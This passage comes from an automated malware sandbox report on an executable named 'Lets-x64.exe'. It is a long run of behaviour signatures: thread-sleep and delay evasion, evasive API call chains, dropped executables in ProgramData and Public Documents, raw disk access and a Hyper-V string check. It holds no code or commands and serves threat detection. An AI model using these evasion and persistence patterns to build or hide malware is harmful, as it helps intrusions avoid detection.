                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5731
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 818
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3632
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4915
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4394
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4186
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1660
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5548
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 786
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5408
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4618
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 695
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3497
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4623
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 979
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1014
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 904
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1006
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 772
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1207
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 826
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 960
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 833
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 373
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 739
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 799
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 900
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 803
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 451
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 821
                              Source: C:\ProgramData\Program\iusb3mon.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_28-35483
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeDropped PE file which has not been started: C:\Program Files\product1\letsvpn-latest.exeJump to dropped file
                              Source: C:\ProgramData\Program\iusb3mon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_28-35451
                              Source: C:\Users\user\Desktop\Lets-x64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-3248
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeAPI coverage: 5.3 %
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe TID: 1848Thread sleep time: -120000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep count: 4179 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep count: 2169 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 4824Thread sleep count: 209 > 30
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 4824Thread sleep time: -41800s >= -30000s
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 3012Thread sleep count: 161 > 30
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 3012Thread sleep time: -32200s >= -30000s
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628Thread sleep count: 394 > 30
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628Thread sleep time: -1182000s >= -30000s
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628Thread sleep count: 8360 > 30
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe TID: 5628Thread sleep time: -25080000s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 703 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -7378697629483816s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep count: 3445 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -3689348814741908s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\Program\iusb3mon.exe TID: 7276Thread sleep time: -121620s >= -30000s
                              Source: C:\ProgramData\Program\iusb3mon.exe TID: 8004Thread sleep time: -83000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 7568Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 3304Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 5301 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 508 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep count: 3436 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep count: 3347 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 334 > 30
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -3689348814741908s >= -30000s
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep count: 5731 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5352Thread sleep count: 3974 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 818 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 4186 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 1660 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2460Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2448Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep count: 4623 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2164Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1496Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3236Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -10145709240540247s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6624Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 528Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1164Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2132Thread sleep time: -7378697629483816s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeFile opened: PhysicalDrive0
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\ProgramData\Program\iusb3mon.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_06242E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,28_2_06242E2C
                              Source: C:\ProgramData\Program\iusb3mon.exeCode function: 28_2_062472F5 GetSystemInfo,wsprintfA,28_2_062472F5
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: svchost.exe, 00000021.00000002.4015334766.000001F079E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006185000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWter
